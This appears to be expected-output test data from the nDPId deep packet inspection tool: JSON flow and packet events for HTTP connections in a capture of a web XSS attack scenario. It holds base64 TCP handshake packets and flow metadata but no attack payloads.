+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347867086,"flow_last_seen":1499347867086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347867086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1499347867086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sxZAAD4GErqsEAABwKgKMoL2AFBvHeVWAAAAAKACchAvzQAAAgQFtAQCCAoBPFZAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":2,"flow_last_seen":1499347867086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgvZcEWBbbx3lV6AScSBIpAAAAgQFtAQCCAoD5ie1ATxWQAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":3,"flow_last_seen":1499347867087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347867087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sxdAAD4GEsGsEAABwKgKMoL2AFBvHeVXXBFgXIAQAOXnqwAAAQEICgE8VkAD5ie1"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347868358,"flow_last_seen":1499347868358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347868358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1499347868358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8189AAD4G7gCsEAABwKgKMoMEAFA06oCxAAAAAKACchDNWQAAAgQFtAQCCAoBPFd+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":2,"flow_last_seen":1499347868358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgwSCLK7WNOqAsqAScSBwXAAAAgQFtAQCCAoD5ijzATxXfgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":3,"flow_last_seen":1499347868359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347868359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA019BAAD4G7gesEAABwKgKMoMEAFA06oCygiyu14AQAOUPZAAAAQEICgE8V34D5ijz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347869628,"flow_last_seen":1499347869628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347869628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1499347869628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbNAAD4GaB2sEAABwKgKMoMSAFAbjgUPAAAAAKACchBhDAAAAgQFtAQCCAoBPFi8AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7504,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":2,"flow_last_seen":1499347869628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgxKd9DBxG44FEKAScSBlbwAAAgQFtAQCCAoD5iowATxYvAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":3,"flow_last_seen":1499347869629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347869629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbRAAD4GaCSsEAABwKgKMoMSAFAbjgUQnfQwcoAQAOUEdwAAAQEICgE8WLwD5iow"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347872187,"flow_last_seen":1499347872187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347872187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1499347872187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ycVAAD4G\/AqsEAABwKgKMoMsAFDCtZL+AAAAAKACchApXAAAAgQFtAQCCAoBPFs7AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":2,"flow_last_seen":1499347872187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgyztIpfbwrWS\/6AScSB0pgAAAgQFtAQCCAoD5iywATxbOwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":3,"flow_last_seen":1499347872188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347872188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ycZAAD4G\/BGsEAABwKgKMoMsAFDCtZL\/7SKX3IAQAOUTrQAAAQEICgE8WzwD5iyw"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347873465,"flow_last_seen":1499347873465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347873465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1499347873465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+eFAAD4Gy+6sEAABwKgKMoM6AFCd+qWaAAAAAKACchA6LQAAAgQFtAQCCAoBPFx7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":2,"flow_last_seen":1499347873465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgzpjWOt2nfqlm6AScSC6ZwAAAgQFtAQCCAoD5i3vATxcewEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7536,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":3,"flow_last_seen":1499347873466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347873466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+eJAAD4Gy\/WsEAABwKgKMoM6AFCd+qWbY1jrd4AQAOVZbwAAAQEICgE8XHsD5i3v"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347874737,"flow_last_seen":1499347874737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1499347874737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88wxAAD4G0sOsEAABwKgKMoNIAFDgx661AAAAAKACchDs+AAAAgQFtAQCCAoBPF25AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":2,"flow_last_seen":1499347874737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg0iSQssc4MeutqAScSBdZQAAAgQFtAQCCAoD5i8tATxduQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":3,"flow_last_seen":1499347874738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347874738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08w1AAD4G0sqsEAABwKgKMoNIAFDgx662kkLLHYAQAOX8bAAAAQEICgE8XbkD5i8t"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347877292,"flow_last_seen":1499347877292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347877292,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1499347877292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t4hAAD4GDkisEAABwKgKMoNiAFCEB9ewAAAAAKACchAeJQAAAgQFtAQCCAoBPGA4AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":2,"flow_last_seen":1499347877292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg2I\/o2nZhAfXsaAScSA\/9QAAAgQFtAQCCAoD5jGsATxgOAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":3,"flow_last_seen":1499347877293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347877293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t4lAAD4GDk+sEAABwKgKMoNiAFCEB9exP6Np2oAQAOXe\/AAAAQEICgE8YDgD5jGs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347878568,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347878568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UNxAAD4GdPSsEAABwKgKMoNwAFDv6DGrAAAAAKACchBW\/AAAAgQFtAQCCAoBPGF3AAAAAAEDAwc="} 
